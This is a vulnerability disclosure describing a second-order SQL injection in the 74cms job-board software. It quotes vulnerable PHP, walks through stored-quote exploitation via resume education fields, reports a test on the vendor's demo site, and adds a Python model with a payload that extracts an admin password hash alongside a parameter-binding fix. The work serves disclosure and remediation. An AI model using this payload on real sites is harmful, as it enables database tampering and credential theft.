74cms (20140709) Second-Order Injection
Instead of fixing the code that causes the vulnerability, the vendor only modified the filter function.
Although I cannot bypass the current filter function, several data points can still be reached.
The previous report was not accepted, so this time I am submitting two cases.
P.S.
You should not only modify the filter function, but also properly fix the vulnerable code.
First case. I will not analyze the code for this one.
First register an enterprise member, then create an enterprise.
The single quote in the enterprise name is escaped on input and then stored; the escape is consumed by MySQL, so the bare quote lands in the database.
Now find the place where that value is read back out of the database.
After creating the enterprise, publish a job posting as follows.
Click Publish and look at the error message: the enterprise name just entered has been read back and brought into the query.
With a slightly constructed payload, data can still be output. I will not say much about this one; the second case goes into detail.
_____________________________________________________________________________
Second case
Unlike the previous one, this time register an individual (job-seeker) member.
Then publish your resume.
Look at the code.
In user/personal/personal_resume.php:
} elseif ($act == 'make4_save') {
    $resume_education = get_resume_education($_SESSION['uid'], $_REQUEST['pid']);
    if (count($resume_education) >= 6) showmsg('Educational experience cannot exceed 6!', 1, $link);
    $setsqlarr['uid'] = intval($_SESSION['uid']);
    $setsqlarr['pid'] = intval($_REQUEST['pid']);
    if ($setsqlarr['uid'] == 0 || $setsqlarr['pid'] == 0) showmsg('Parameter error!', 1);
    // POST values are taken as-is; they have only been through the global escaping
    $setsqlarr['start'] = trim($_POST['start']) ? $_POST['start'] : showmsg('Enter the start time!', 1, $link);
    $setsqlarr['endtime'] = trim($_POST['endtime']) ? $_POST['endtime'] : showmsg('Enter the end time!', 1, $link);
    $setsqlarr['school'] = trim($_POST['school']) ? $_POST['school'] : showmsg('Enter the school name!', 1, $link);
    $setsqlarr['speciality'] = trim($_POST['speciality']) ? $_POST['speciality'] : showmsg('Enter a speciality name!', 1, $link);
    $setsqlarr['education'] = trim($_POST['education']) ? $_POST['education'] : showmsg('Select a degree!', 1, $link);
    $setsqlarr['education_cn'] = trim($_POST['education_cn']) ? $_POST['education_cn'] : showmsg('Select a degree!', 1, $link);
    if (inserttable(table('resume_education'), $setsqlarr)) {
        // the stored (now unescaped) values are read back inside check_resume()
        check_resume($_SESSION['uid'], intval($_REQUEST['pid']));
        ...
inserttable(table('resume_education'), $setsqlarr)
Here the POST data is inserted into the database.
We submit a single quote; it is escaped on input, so the INSERT itself is safe.
However, the escape character is consumed when the row is written, so the bare single quote is what ends up in the database.
Then proceed to check_resume:
function check_resume($uid, $pid)
{
    global $db, $timestamp, $_CFG;
    $uid = intval($uid);
    $pid = intval($pid);
    $percent = 0;
    $resume_basic = get_resume_basic($uid, $pid);
    $resume_intention = $resume_basic['intention_jobs'];
    $resume_specialty = $resume_basic['specialty'];
    // reads the education rows (including our stored single quote) back out of the database
    $resume_education = get_resume_education($uid, $pid);
    if (!empty($resume_basic)) $percent = $percent + 15;
    if (!empty($resume_intention)) $percent = $percent + 15;
    if (!empty($resume_specialty)) $percent = $percent + 15;
    if (!empty($resume_education)) $percent = $percent + 15;
    if ($resume_basic['photo_img'] && $resume_basic['photo_audit'] == "1" && $resume_basic['photo_display'] == "1") {
        $setsqlarr['photo'] = 1;
    } else {
        $setsqlarr['photo'] = 0;
    }
    if ($percent < 60) {
        $setsqlarr['complete_percent'] = $percent;
        $setsqlarr['complete'] = 2;
    } else {
        $resume_work = get_resume_work($uid, $pid);
        $resume_training = get_resume_training($uid, $pid);
        $resume_photo = $resume_basic['photo_img'];
        if (!empty($resume_work)) $percent = $percent + 13;
        if (!empty($resume_training)) $percent = $percent + 13;
        if (!empty($resume_photo)) $percent = $percent + 14;
        $setsqlarr['complete'] = 1;
        $setsqlarr['complete_percent'] = $percent;
        require_once(QISHI_ROOT_PATH . 'include/splitword.class.php');
        $sp = new SPWord();
        $setsqlarr['key'] = $resume_basic['intention_jobs'] . $resume_basic['recentjobs'] . $resume_basic['specialty'];
        $setsqlarr['key'] = "{$resume_basic['fullname']} " . $sp->extracttag($setsqlarr['key']);
        $setsqlarr['key'] = str_replace(",", " ", $resume_basic['intention_jobs']) . " {$setsqlarr['key']} {$resume_basic['education_cn']}";
        $setsqlarr['key'] = $sp->pad($setsqlarr['key']);
        if (!empty($resume_education)) {
            foreach ($resume_education as $li) {
                // school/speciality come straight from the database, without re-escaping
                $setsqlarr['key'] = "{$li['school']} {$setsqlarr['key']} {$li['speciality']}";
            }
        }
        $setsqlarr['refreshtime'] = $timestamp;
    }
    // $setsqlarr is concatenated into the SET clause of the UPDATE
    updatetable(table('resume'), $setsqlarr, "uid='{$uid}' AND id='{$pid}'");
    updatetable(table('resume_tmp'), $setsqlarr, "uid='{$uid}' AND id='{$pid}'");
}
$resume_education = get_resume_education($uid, $pid);
Here the row just inserted is read back out of the database, so the single quote comes out with it. Continue.
$setsqlarr['key'] = $resume_basic['intention_jobs'] . $resume_basic['recentjobs'] . $resume_basic['specialty'];
$setsqlarr['key'] = "{$resume_basic['fullname']} " . $sp->extracttag($setsqlarr['key']);
$setsqlarr['key'] = str_replace(",", " ", $resume_basic['intention_jobs']) . " {$setsqlarr['key']} {$resume_basic['education_cn']}";
$setsqlarr['key'] = $sp->pad($setsqlarr['key']);
if (!empty($resume_education)) {
    foreach ($resume_education as $li) {
        $setsqlarr['key'] = "{$li['school']} {$setsqlarr['key']} {$li['speciality']}";
    }
}
$setsqlarr['refreshtime'] = $timestamp;
}
updatetable(table('resume'), $setsqlarr, "uid='{$uid}' AND id='{$pid}'");
updatetable(table('resume_tmp'), $setsqlarr, "uid='{$uid}' AND id='{$pid}'");
Then the value read from the database is placed into an array and passed to the update, causing injection.
The injection point is in the SET clause of the UPDATE, so we can update any column of this table.
An error is reported.
Here the address field is updated to the data we want to output.
The data is successfully extracted through the keyword field.
Tested successfully on the demo site.
Http://demo.74cms.com/resume/resume-show-6271.htm
You should fix the code rather than simply modifying the filter function.
This type of second-order injection only calls stripcslashes once.
74cms implements global escaping; if the value is escaped once more, it still contains an escape character even when stored in the database, so it is naturally safe when read back out.
Alternatively, apply addslashes once to the data after it is read out of the database.
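The second case (make4_save storing the quote, check_resume reading it back and concatenating it into the UPDATE) and the fix discussed just above, reduced to a runnable model. This is an added example, not code from 74cms or from the original author: it uses Python with an in-memory SQLite database in place of PHP and MySQL, so the escape function doubles quotes where addslashes() would backslash them (the second-order behaviour is identical, since the parser consumes the escape either way). The table layout, the admin table, and the password hash value are constructed assumptions.

```python
import sqlite3

# Constructed model of the 74cms second-order injection; table and column
# names are simplified assumptions, not the project's real schema.


def escape(value):
    """Stand-in for the global addslashes()-style escaping that 74cms
    applies to request input. Protects only the statement it is used in."""
    return value.replace("'", "''")


def setup_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE admin(id INTEGER, username TEXT, password TEXT);
        CREATE TABLE resume_education(uid INTEGER, pid INTEGER,
                                      school TEXT, speciality TEXT);
        CREATE TABLE resume(uid INTEGER, id INTEGER, "key" TEXT);
        INSERT INTO admin VALUES (1, 'admin', 'sample-hash-not-real');
        INSERT INTO resume VALUES (1, 7, '');
        INSERT INTO resume VALUES (2, 9, '');
    """)
    return conn


def make4_save(conn, uid, pid, school, speciality):
    """act=make4_save: inserttable() interpolates the already-escaped POST
    values. The INSERT is safe, but the bare quote lands in the table."""
    sql = ("INSERT INTO resume_education(uid, pid, school, speciality) VALUES "
           f"({int(uid)}, {int(pid)}, '{escape(school)}', '{escape(speciality)}')")
    conn.execute(sql)


def build_key(conn, uid, pid):
    """The check_resume() loop: read the education rows back out of the
    database and concatenate school/speciality, with no re-escaping."""
    rows = conn.execute(
        "SELECT school, speciality FROM resume_education WHERE uid=? AND pid=?",
        (uid, pid)).fetchall()
    key = ""
    for school, speciality in rows:
        key = f"{school} {key} {speciality}"
    return key


def check_resume_vulnerable(conn, uid, pid):
    """updatetable() as check_resume() uses it: the SET clause is built by
    string concatenation from values that came out of the database."""
    uid, pid = int(uid), int(pid)
    key = build_key(conn, uid, pid)
    sql = f"UPDATE resume SET \"key\"='{key}' WHERE uid='{uid}' AND id='{pid}'"
    conn.execute(sql)
    return sql


def check_resume_fixed(conn, uid, pid):
    """Same logic with the value bound as a parameter. Re-escaping the
    read-back value (the addslashes-after-read suggestion above) also closes
    this instance; binding removes the class of bug."""
    uid, pid = int(uid), int(pid)
    key = build_key(conn, uid, pid)
    conn.execute('UPDATE resume SET "key"=? WHERE uid=? AND id=?', (key, uid, pid))


def read_key(conn, uid, pid):
    return conn.execute('SELECT "key" FROM resume WHERE uid=? AND id=?',
                        (uid, pid)).fetchone()[0]


# Constructed payload submitted as the "school" field. It survives the INSERT
# because it is escaped there, then closes the quote in the UPDATE's SET
# clause, copies the admin hash into our own keyword column (the rightmost
# assignment to a column wins) and comments out the original WHERE clause.
PAYLOAD = "x',\"key\"=(SELECT password FROM admin WHERE id=1) WHERE uid=1 AND id=7 -- "


def run_demo():
    vuln = setup_db()
    make4_save(vuln, 1, 7, PAYLOAD, "cs")
    check_resume_vulnerable(vuln, 1, 7)

    fixed = setup_db()
    make4_save(fixed, 1, 7, PAYLOAD, "cs")
    check_resume_fixed(fixed, 1, 7)

    return {
        "stored_school": vuln.execute("SELECT school FROM resume_education").fetchone()[0],
        "vulnerable_key": read_key(vuln, 1, 7),   # admin hash leaked into our resume
        "other_user_key": read_key(vuln, 2, 9),   # untouched: injected WHERE scoped it
        "fixed_key": read_key(fixed, 1, 7),       # payload stored as a literal string
    }


if __name__ == "__main__":
    for name, value in run_demo().items():
        print(f"{name}: {value!r}")
```

The point the model makes concrete: the escape applied at request time is gone by the time get_resume_education() returns the row, so any later statement that concatenates that value is as exposed as if no escaping had happened. Escaping again on read-back works for this one path, but binding parameters (or escaping inside updatetable() itself, at the point of concatenation) is what an editor would push for, because it does not depend on every caller remembering the rule.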